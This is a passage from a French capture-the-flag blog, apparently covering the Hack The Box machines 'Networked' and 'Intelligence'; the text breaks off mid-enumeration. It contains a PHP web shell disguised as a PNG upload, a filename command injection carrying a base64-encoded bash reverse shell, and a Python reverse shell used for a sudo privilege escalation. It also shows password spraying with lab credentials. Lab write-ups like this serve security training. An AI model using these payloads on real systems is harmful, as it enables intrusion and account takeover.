(protocol 2.0) | ssh-hostkey: | 2048 2275d7a74f81a7af5266e52744b1015b (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFgr+LYQ5zL9JWnZmjxP7FT1134sJla89HBT+qnqNvJQRHwO7IqPSa5tEWGZYtzQ2BehsEqb/PisrRHlTeatK0X8qrS3tuz+l1nOj3X/wdcgnFXBrhwpRB2spULt2YqRM49aEbm7bRf2pctxuvgeym/pwCghb6nSbdsaCIsoE+X7QwbG0j6ZfoNIJzQkTQY7O+n1tPP8mlwPOShZJP7+NWVf/kiHsgZqVx6xroCp/NYbQTvLWt6VF/V+iZ3tiT7E1JJxJqQ05wiqsnjnFaZPYP+ptTqorUKP4AenZnf9Wan7VrrzVNZGnFlczj/BsxXOYaRe4Q8VK4PwiDbcwliOBd | 256 2d6328fca299c7d435b9459a4b38f9c8 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAsf1XXvL55L6U7NrCo3XSBTr+zCnnQ+GorAMgUugr3ihPkA+4Tw2LmpBr1syz7Z6PkNyQw6NzC3KwSUy1BOGw8= | 256 73cda05b84107da71c7c611df554cfc4 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILMrhnJBfdb0fWQsWVfynAxcQ8+SNlL38vl8VJaaqPTL 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Site doesn\u0026#39;t have a title (text/html; charset=UTF-8). 443/tcp closed https reset ttl 63 Foothold Website : Port 80 En arrivant sur le site, on trouve le message suivant.\n1 2 3 Hello mate, we\u0026#39;re building the new FaceMash! Help by funding us and be the new Tyler\u0026amp;Cameron! Join us at the pool party this Sat to get a glimpse dirsearch : /backup.tar, /upload.php A la racine du site internet, on trouve une archive backup.tar contenant les sources du site internet. De plus, on découvre une page nous permettant d\u0026rsquo;uploader des images et une page pour les observer \u0026ldquo;photos.php\u0026rdquo;. Un dossier /uploads semble contenir les photos téléchargées.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 dirsearch -u http://10.10.10.146 _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289 Target: http://10.10.10.146/ [13:59:45] Scanning: [13:59:53] 301 - 235B - /backup -\u0026gt; http://10.10.10.146/backup/ [13:59:53] 200 - 885B - /backup/ [13:59:53] 403 - 210B - /cgi-bin/ [13:59:55] 200 - 229B - /index.php [13:59:55] 200 - 229B - /index.php/login/ [13:59:57] 200 - 1KB - /photos.php [14:00:00] 200 - 169B - /upload.php [14:00:00] 301 - 236B - /uploads -\u0026gt; http://10.10.10.146/uploads/ [14:00:00] 200 - 2B - /uploads/ Task Completed File Upload : RCE Après avoir analysé le code source récupéré dans le backup.tar, on se rend compte qu\u0026rsquo;il existe un endoit /photos.php permettant d\u0026rsquo;observer les images uploader sur la page /upload.php.\nAprès quelque tests et analyse du code php, on réussi à uploader un fichier php et a executer du code. Pour cela, j\u0026rsquo;ai dans un premier temps uploader une veritable image png, puis j\u0026rsquo;ai changer l\u0026rsquo;extension en \u0026ldquo;.php.png\u0026rdquo;. Ensuite, il a fallu supprimer le texte de l\u0026rsquo;image et le remplacer par du code PHP. Le plus important était de conserver le magic byte \u0026ldquo;PNG\u0026rdquo;, c\u0026rsquo;est à dire les premiers octets de l\u0026rsquo;image permettant de reconnaitre qu\u0026rsquo;il s\u0026rsquo;agit bien d\u0026rsquo;une image PNG.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 POST /upload.php HTTP/1.1 Host: 10.10.10.146 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------19843469784126652896583145162 Content-Length: 383 Origin: http://10.10.10.146 Connection: keep-alive Referer: http://10.10.10.146/upload.php Upgrade-Insecure-Requests: 1 Priority: u=0, i -----------------------------19843469784126652896583145162 Content-Disposition: form-data; name=\u0026#34;myFile\u0026#34;; filename=\u0026#34;htb-logo.php.png\u0026#34; Content-Type: image/png ‰PNG \u001a \u0026lt;?php system($_REQUEST[\u0026#39;cmd\u0026#39;]); ?\u0026gt; -----------------------------19843469784126652896583145162 Content-Disposition: form-data; name=\u0026#34;submit\u0026#34; go! -----------------------------19843469784126652896583145162-- Pour obtenir un reverse shell de qualité, j\u0026rsquo;ai upload ensuite le code \u0026ldquo;Reverse shell Pentest Monnkey\u0026rdquo; afin d\u0026rsquo;obtenir un shell stable :\n1 2 3 4 5 6 7 8 9 10 11 12 13 $ nc -lnvp 1337 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::1337 Ncat: Listening on 0.0.0.0:1337 Ncat: Connection from 10.10.10.146. Ncat: Connection from 10.10.10.146:56866. Linux networked.htb 3.10.0-957.21.3.el7.x86_64 #1 SMP Tue Jun 18 16:35:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux 14:59:42 up 1:04, 0 users, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=48(apache) gid=48(apache) groups=48(apache) bash: no job control in this shell bash-4.2$ whoami apache apache -\u0026gt; guly Improper sanitization : Command Injection A la racine de du /home de l\u0026rsquo;utilisateur guly, on trouve un fichier check_attack.php ainsi qu\u0026rsquo;une crontab montrant que l\u0026rsquo;utilisateur guly execute ce fichier php toute les 3mns.\nOn comprend qu\u0026rsquo;il parcourt le fichier /uploads du site web, si le nom du fichier ne contient pas une IP valide, il execute une commande pour supprimer le fichier.\nCependant, on remarque qu\u0026rsquo;il utilise la fonction exec() avec /bin/rm, au lieu d\u0026rsquo;utiliser une fonction php classique permettant la suppression d\u0026rsquo;un fichier. Cela nous permet de créer un fichier avec des \u0026ldquo;;\u0026rdquo; permettant l\u0026rsquo;execution de n\u0026rsquo;importe quelle commande Bash !\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 bash-4.2$ cat check_attack.php \u0026lt;?php require \u0026#39;/var/www/html/lib.php\u0026#39;; $path = \u0026#39;/var/www/html/uploads/\u0026#39;; $logpath = \u0026#39;/tmp/attack.log\u0026#39;; $to = \u0026#39;guly\u0026#39;; $msg= \u0026#39;\u0026#39;; $headers = \u0026#34;X-Mailer: check_attack.php\\r\\n\u0026#34;; $files = array(); $files = preg_grep(\u0026#39;/^([^.])/\u0026#39;, scandir($path)); foreach ($files as $key =\u0026gt; $value) { $msg=\u0026#39;\u0026#39;; if ($value == \u0026#39;index.html\u0026#39;) { continue; } #echo \u0026#34;-------------\\n\u0026#34;; #print \u0026#34;check: $value\\n\u0026#34;; list ($name,$ext) = getnameCheck($value); $check = check_ip($name,$value); if (!($check[0])) { echo \u0026#34;attack!\\n\u0026#34;; # todo: attach file file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX); exec(\u0026#34;rm -f $logpath\u0026#34;); exec(\u0026#34;nohup /bin/rm -f $path$value \u0026gt; /dev/null 2\u0026gt;\u0026amp;1 \u0026amp;\u0026#34;); echo \u0026#34;rm -f $path$value\\n\u0026#34;; mail($to, $msg, $msg, $headers, \u0026#34;-F$value\u0026#34;); } } ?\u0026gt; bash-4.2$ cat crontab.guly */3 * * * * php /home/guly/check_attack.php Voici un exemple de nom de fichier nous permettant d\u0026rsquo;executer un reverse shell facilement :\n1 2 3 4 5 6 7 8 cd /var/www/html/uploads touch \u0026#39;a; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yLzkwMDEgMD4mMQ== | base64 -d | bash; ls\u0026#39; # Voici la commande # nohup /bin/rm -f $path$value \u0026gt; /dev/null 2\u0026gt;\u0026amp;1 \u0026amp; # Voici ce que le programme va reellement executer nohup /bin/rm -f /var/www/html/uploads/a; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yLzkwMDEgMD4mMQ== | base64 -d | bash; ls \u0026gt; /dev/null 2\u0026gt;\u0026amp;1 \u0026amp; On obtient bien un shell en tant que guly :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 $ nc -lnvp 9001 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001 Ncat: Connection from 10.10.10.146. Ncat: Connection from 10.10.10.146:47670. bash: no job control in this shell [guly@networked ~]$ whoami whoami guly [guly@networked ~]$ python2 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; python2 -c \u0026#39;import pty;pty.spawn(\u0026#34;/bin/bash\u0026#34;)\u0026#39; [guly@networked ~]$ export TERM=xterm export TERM=xterm [guly@networked ~]$ ^Z [1] + 4656 suspended nc -lnvp 9001 $ stty raw -echo;fg [1] + 4656 continued nc -lnvp 9001 [guly@networked ~]$ [guly@networked ~]$ ls check_attack.php crontab.guly\tk user.txt [guly@networked ~]$ cat user.txt 37e0.....3b8 guly -\u0026gt; root Enumeration 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 [guly@networked ~]$ cat /etc/sysconfig/network-scripts/ifcfg-guly DEVICE=guly0 ONBOOT=no NM_CONTROLLED=no NAME=ps /tmp/foo PROXY_METHOD=asodih BROWSER_ONLY=asdoih BOOTPROTO=asdoih [guly@networked ~]$ sudo -l Matching Defaults entries for guly on networked: !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep=\u0026#34;COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS\u0026#34;, env_keep+=\u0026#34;MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE\u0026#34;, env_keep+=\u0026#34;LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES\u0026#34;, env_keep+=\u0026#34;LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE\u0026#34;, env_keep+=\u0026#34;LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY\u0026#34;, secure_path=/sbin\\:/bin\\:/usr/sbin\\:/usr/bin User guly may run the following commands on networked: (root) NOPASSWD: /usr/local/sbin/changename.sh /usr/local/sbin/changename.sh Le script nous demande de renseigner plusieurs valeur: NAME, PROXY_METHOD\u0026hellip;\nCes valeurs sont mises dans un fichier : /etc/sysconfig/network-scripts/ifcfg-guly\nEnsuite, la commande suivante est executé : /sbin/ifup guly0\nCe fichier permet donc de configurer une interface, puis de l\u0026rsquo;activer \u0026ldquo;/sbin/ifup INTERFACE\u0026rdquo;.\nAprès quelques recherches sur internet, et d\u0026rsquo;après l\u0026rsquo;indication fournis, il semble qu\u0026rsquo;une injection de commande soit possible dans le fichier de l\u0026rsquo;interface. En fait, chaque ligne est executé comme du code Bash.\nDonc lorsqu\u0026rsquo;on ecrit :\nNAME=VALUE COMMAND ARGS NAME prend bien la valeur VALUE, mais ce qui suit est executé comme une commande, on peut même passer des arguments si necessaire.\nLorsque qu\u0026rsquo;on allume l\u0026rsquo;interface, le code Bash malicieux est tout de suite executé.\nOn remarque pourtant un filtre mais il n\u0026rsquo;est pas suffisant.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 [guly@networked ~]$ cat /usr/local/sbin/changename.sh #!/bin/bash -p cat \u0026gt; /etc/sysconfig/network-scripts/ifcfg-guly \u0026lt;\u0026lt; EoF DEVICE=guly0 ONBOOT=no NM_CONTROLLED=no EoF regexp=\u0026#34;^[a-zA-Z0-9_\\ /-]+$\u0026#34; for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo \u0026#34;interface $var:\u0026#34; read x while [[ ! $x =~ $regexp ]]; do echo \u0026#34;wrong input, try again\u0026#34; echo \u0026#34;interface $var:\u0026#34; read x done echo $var=$x \u0026gt;\u0026gt; /etc/sysconfig/network-scripts/ifcfg-guly done /sbin/ifup guly0 [guly@networked ~]$ cat /etc/sysconfig/network-scripts/ifcfg-guly DEVICE=guly0 ONBOOT=no NM_CONTROLLED=no NAME=ps /tmp/foo PROXY_METHOD=eee BROWSER_ONLY=eee BOOTPROTO=eee Command Injection On crée un fichier \u0026ldquo;/tmp/shell\u0026rdquo; avec un code pour ouvrir un reverse shell. Ici, j\u0026rsquo;ai choisi d\u0026rsquo;utiliser un reverse shell python. Mais un code Bash classique pouvait fonctionner aussi.\n1 2 [guly@networked ~]$ cat /tmp/shell python -c \u0026#39;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\u0026#34;10.10.14.2\u0026#34;,7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\u0026#34;bash\u0026#34;)\u0026#39; Ensuite, on execute notre programme avec sudo, et on précise une valeur pour la variable suivi du nom de notre programme pour ouvrir le reverse shell :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 [guly@networked ~]$ sudo /usr/local/sbin/changename.sh interface NAME: randomtext /tmp/shell interface PROXY_METHOD: randomtext interface BROWSER_ONLY: randomtext interface BOOTPROTO: randomtext ----------------------------------- nc -lnvp 7777 Ncat: Version 7.93 ( https://nmap.org/ncat ) Ncat: Listening on :::7777 Ncat: Listening on 0.0.0.0:7777 Ncat: Connection from 10.10.10.146. Ncat: Connection from 10.10.10.146:58160. [root@networked network-scripts]# cat /root/root.txt cat /root/root.txt d1ce.....e93 ","date":"2025-09-04T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/networked-htb/","title":"HTB | Networked"},{"content":" Machine name OS IP Difficulty Intelligence Windows 10.10.10.248 Medium Users 1 2 3 Tiffany.Molina : NewIntelligenceCorpUser9876 Ted.Graves : Mr.Teddy svc_int$:::1dcabcce2cf522bae77d7dc622587879 Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 $ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.248 PORT STATE SERVICE REASON VERSION 53/tcp open domain syn-ack ttl 127 Simple DNS Plus 80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-title: Intelligence |_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA 88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-03 19:34:02Z) 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::\u0026lt;unsupported\u0026gt;, DNS:dc.intelligence.htb | Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-04-19T00:43:16 | Not valid after: 2022-04-19T00:43:16 | MD5: 7767953367fbd65d6065dff77ad83e88 | SHA-1: 155529d9fef81aec41b7dab284d70f9d30c7bde7 |_ssl-date: 2025-09-03T19:35:37+00:00; +7h00m00s from scanner time. 445/tcp open microsoft-ds? syn-ack ttl 127 464/tcp open kpasswd5? syn-ack ttl 127 593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-09-03T19:35:36+00:00; +7h00m00s from scanner time. | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::\u0026lt;unsupported\u0026gt;, DNS:dc.intelligence.htb | Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-04-19T00:43:16 | Not valid after: 2022-04-19T00:43:16 | MD5: 7767953367fbd65d6065dff77ad83e88 | SHA-1: 155529d9fef81aec41b7dab284d70f9d30c7bde7 3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-09-03T19:35:37+00:00; +7h00m00s from scanner time. | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::\u0026lt;unsupported\u0026gt;, DNS:dc.intelligence.htb | Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-04-19T00:43:16 | Not valid after: 2022-04-19T00:43:16 | MD5: 7767953367fbd65d6065dff77ad83e88 | SHA-1: 155529d9fef81aec41b7dab284d70f9d30c7bde7 3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc.intelligence.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::\u0026lt;unsupported\u0026gt;, DNS:dc.intelligence.htb | Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-04-19T00:43:16 | Not valid after: 2022-04-19T00:43:16 | MD5: 7767953367fbd65d6065dff77ad83e88 | SHA-1: 155529d9fef81aec41b7dab284d70f9d30c7bde7 |_ssl-date: 2025-09-03T19:35:36+00:00; +7h00m00s from scanner time. 9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing 49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49691/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0 49692/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49710/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49713/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC Foothold intelligence.htb On découvre un site web sur le port 80 de notre machine.\nFuzzing files Sur la page d\u0026rsquo;accueil on nous indique un lien vers un fichier :\nhttp://intelligence.htb/documents/2020-01-01-upload.pdf Un deuxième lien est présent avec un fichier contenant une autre date.\nOn fait la déduction que d\u0026rsquo;autres files peuvent etre présents, si l\u0026rsquo;on réussi à faire du fuzzing avec la date.\nDans un premier temps, on génére donc un fichier Python qui parcourt toutes les dates dans le bon format de 2015 à 2022 pour un premier test. On redirige ensuite la liste dans un fichier.\n1 2 3 4 5 6 7 8 9 10 11 from datetime import date, timedelta def daterange(start_date: date, end_date: date): days = int((end_date - start_date).days) for n in range(days): yield start_date + timedelta(n) start_date = date(2015, 1, 1) end_date = date(2022, 6, 2) for single_date in daterange(start_date, end_date): print(single_date.strftime(\u0026#34;%Y-%m-%d\u0026#34;)) Ensuite, on utilise ffuf pour faire du fuzzing et récupérer toutes les URL des potentiels fichiers téléchargeables :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 $ ffuf -c -w dates.txt -u \u0026#34;http://intelligence.htb/documents/FUZZ-upload.pdf\u0026#34; -o results.json -of json /\u0026#39;___\\ /\u0026#39;___\\ /\u0026#39;___\\ /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \\/_/ \\/_/ \\/___/ \\/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://intelligence.htb/documents/FUZZ-upload.pdf :: Wordlist : FUZZ: /workspace/Intelligence/dates.txt :: Output file : results.json :: File format : json :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 ________________________________________________ 2020-01-01 [Status: 200, Size: 26835, Words: 241, Lines: 209, Duration: 35ms] 2020-01-02 [Status: 200, Size: 27002, Words: 229, Lines: 199, Duration: 31ms] 2020-01-25 [Status: 200, Size: 26252, Words: 225, Lines: 193, Duration: 24ms] 2020-01-20 [Status: 200, Size: 11632, Words: 157, Lines: 127, Duration: 27ms] 2020-01-23 [Status: 200, Size: 11557, Words: 167, Lines: 136, Duration: 35ms] 2020-01-22 [Status: 200, Size: 28637, Words: 236, Lines: 224, Duration: 37ms] 2020-01-10 [Status: 200, Size: 26400, Words: 232, Lines: 205, Duration: 40ms] 2020-01-04 [Status: 200, Size: 27522, Words: 223, Lines: 196, Duration: 49ms] 2020-01-30 [Status: 200, Size: 26706, Words: 242, Lines: 193, Duration: 39ms] 2020-02-24 [Status: 200, Size: 27332, Words: 237, Lines: 206, Duration: 23ms] 2020-03-04 [Status: 200, Size: 26194, Words: 235, Lines: 202, Duration: 21ms] 2020-02-28 [Status: 200, Size: 11543, Words: 167, Lines: 131, Duration: 23ms] 2020-02-11 [Status: 200, Size: 25245, Words: 241, Lines: 198, Duration: 29ms] 2020-02-17 [Status: 200, Size: 11228, Words: 167, Lines: 132, Duration: 29ms] 2020-02-23 [Status: 200, Size: 27378, Words: 247, Lines: 213, Duration: 33ms] 2020-03-05 [Status: 200, Size: 26124, Words: 221, Lines: 205, Duration: 33ms] 2020-03-12 [Status: 200, Size: 27143, Words: 233, Lines: 213, Duration: 24ms] 2020-03-21 [Status: 200, Size: 11250, Words: 157, Lines: 134, Duration: 24ms] ... 2021-03-25 [Status: 200, Size: 27327, Words: 231, Lines: 211, Duration: 22ms] 2021-03-21 [Status: 200, Size: 26810, Words: 229, Lines: 205, Duration: 31ms] 2021-03-27 [Status: 200, Size: 12127, Words: 166, Lines: 141, Duration: 28ms] :: Progress: [2709/2709] :: Job [1/1] :: 1562 req/sec :: Duration: [0:00:01] :: Errors: 0 :: Il faut ensuite parcourir cette liste d\u0026rsquo;url pour télécharger tous les fichiers. En Python, ça nous donne le code suivant :\n1 2 3 4 5 6 7 8 9 10 11 cat ffuf_dl.py import json import subprocess with open(\u0026#34;results.json\u0026#34;) as f: data = json.load(f) for result in data[\u0026#34;results\u0026#34;]: url = result[\u0026#34;url\u0026#34;] print(f\u0026#34;[*] Téléchargement de {url}\u0026#34;) subprocess.run([\u0026#34;wget\u0026#34;, \u0026#34;-q\u0026#34;, \u0026#34;-P\u0026#34;, \u0026#34;pdfs/\u0026#34;, url]) Dans le dossier pdfs/ se trouve une grande quantité de fichiers\nPassword found in pdfs J\u0026rsquo;ai utilisé la commande pdftotext afin de convertir les pdfs en texte. Ensuite, en affichant le texte de tous les pdfs et en recherchant le mot clé \u0026ldquo;password\u0026rdquo;, on trouve un match ! Le mot de passe : NewIntelligenceCorpUser9876\n1 2 3 4 5 6 7 8 9 10 11 $ for f in *.pdf do pdftotext $f done $ cat *.txt | grep -i password -A3 -B3 New Account Guide Welcome to Intelligence Corp! Please login using your username and the default password of: NewIntelligenceCorpUser9876 After logging in please change your password as soon as possible. On trouve également le message suivant:\n1 2 3 4 5 Internal IT Update There has recently been some outages on our web servers. Ted has gotten a script in place to help notify us if this happens again. Also, after discussion following our recent security audit we are in the process of locking down our service accounts. User list from pdfs creators En utilisant exiftool, on peut recuperer beaucoup d\u0026rsquo;information sur les PDFs et notamment le nom des createurs ayant généré les pdfs. On peut alors obtenir une liste d\u0026rsquo;utilisateurs potentiels\n1 2 3 4 5 6 7 8 exiftool pdfs/*.pdf | grep -i creator | awk \u0026#39;{print $3}\u0026#39; William.Lee Scott.Scott ... Tiffany.Molina \u0026lt;----------- ... Ian.Duncan Richard.Williams Avec kerbrute, on peut vérifier si les utilisateurs existent. Une très grosse partie existe en vérité. Avec nxc on effectue un password spray et on trouve les credentials suivants: intelligence.htb\\Tiffany.Molina:NewIntelligenceCorpUser9876\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 $ kerbrute userenum --dc dc.intelligence.htb -d intelligence.htb users.txt __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \\/ ___/ __ \\/ ___/ / / / __/ _ \\ / ,\u0026lt; / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\\___/_/ /_.___/_/ \\__,_/\\__/\\___/ Version: dev (n/a) - 09/03/25 - Ronnie Flathers @ropnop 2025/09/03 16:03:02 \u0026gt; Using KDC(s): 2025/09/03 16:03:02 \u0026gt; dc.intelligence.htb:88 2025/09/03 16:03:02 \u0026gt; [+] VALID USERNAME:\tStephanie.Young@intelligence.htb 2025/09/03 16:03:02 \u0026gt; [+] VALID USERNAME:\tVeronica.Patel@intelligence.htb 2025/09/03 16:03:02 \u0026gt; [+] VALID USERNAME:\tJason.Wright@intelligence.htb 2025/09/03 16:03:02 \u0026gt; [+] VALID USERNAME:\tDavid.Reed@intelligence.htb 2025/09/03 16:03:02 \u0026gt; [+] VALID USERNAME:\tScott.Scott@intelligence.htb ...... $ nxc smb 10.10.10.248 -u users.txt -p pass.txt SMB 10.10.10.248 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False) SMB 10.10.10.248 445 DC [-] intelligence.htb\\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE ... SMB 10.10.10.248 445 DC [-] intelligence.htb\\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [-] intelligence.htb\\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE SMB 10.10.10.248 445 DC [+] intelligence.htb\\Tiffany.Molina:NewIntelligenceCorpUser9876 Tiffany.Molina : user flag On trouve un Share User accessible en lecture par Tiffany. On trouve finalement les fichiers de Tiffany et le flag user.txt\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 smbclient //10.10.10.248/users -U \u0026#39;Tiffany.Molina%NewIntelligenceCorpUser9876\u0026#39; Try \u0026#34;help\u0026#34; to get a list of possible commands. smb: \\\u0026gt; ls . DR 0 Mon Apr 19 03:20:26 2021 .. DR 0 Mon Apr 19 03:20:26 2021 Administrator D 0 Mon Apr 19 02:18:39 2021 All Users DHSrn 0 Sat Sep 15 09:21:46 2018 Default DHR 0 Mon Apr 19 04:17:40 2021 Default User DHSrn 0 Sat Sep 15 09:21:46 2018 desktop.ini AHS 174 Sat Sep 15 09:11:27 2018 Public DR 0 Mon Apr 19 02:18:39 2021 Ted.Graves D 0 Mon Apr 19 03:20:26 2021 Tiffany.Molina D 0 Mon Apr 19 02:51:46 2021 3770367 blocks of size 4096. 1453992 blocks available smb: \\\u0026gt; cd Tiffany.molina smb: \\Tiffany.molina\\\u0026gt; cd Desktop smb: \\Tiffany.molina\\Desktop\\\u0026gt; ls . DR 0 Mon Apr 19 02:51:46 2021 .. DR 0 Mon Apr 19 02:51:46 2021 user.txt AR 34 Wed Sep 3 21:31:06 2025 3770367 blocks of size 4096. 1453992 blocks available smb: \\Tiffany.molina\\Desktop\\\u0026gt; get user.txt getting file \\Tiffany.molina\\Desktop\\user.txt of size 34 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec) smb: \\Tiffany.molina\\Desktop\\\u0026gt; $ cat user.txt 359b.....159e Rusthound bloodhound 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 $ rusthound -d intelligence.htb -u \u0026#34;Tiffany.Molina\u0026#34;@\u0026#34;intelligence.htb\u0026#34; -p \u0026#34;NewIntelligenceCorpUser9876\u0026#34; -o /workspace/Intelligence/bloodhount_data --zip -n 10.10.10.248 --------------------------------------------------- Initializing RustHound at 16:50:28 on 09/03/25 Powered by g0h4n from OpenCyber --------------------------------------------------- [2025-09-03T14:50:28Z INFO rusthound] Verbosity level: Info [2025-09-03T14:50:28Z INFO rusthound::ldap] Connected to INTELLIGENCE.HTB Active Directory! [2025-09-03T14:50:28Z INFO rusthound::ldap] Starting data collection... [2025-09-03T14:50:28Z INFO rusthound::ldap] All data collected for NamingContext DC=intelligence,DC=htb [2025-09-03T14:50:28Z INFO rusthound::json::parser] Starting the LDAP objects parsing... [2025-09-03T14:50:28Z INFO rusthound::json::parser::bh_41] MachineAccountQuota: 10 [2025-09-03T14:50:28Z INFO rusthound::json::parser] Parsing LDAP objects finished! [2025-09-03T14:50:28Z INFO rusthound::json::checker] Starting checker to replace some values... [2025-09-03T14:50:28Z INFO 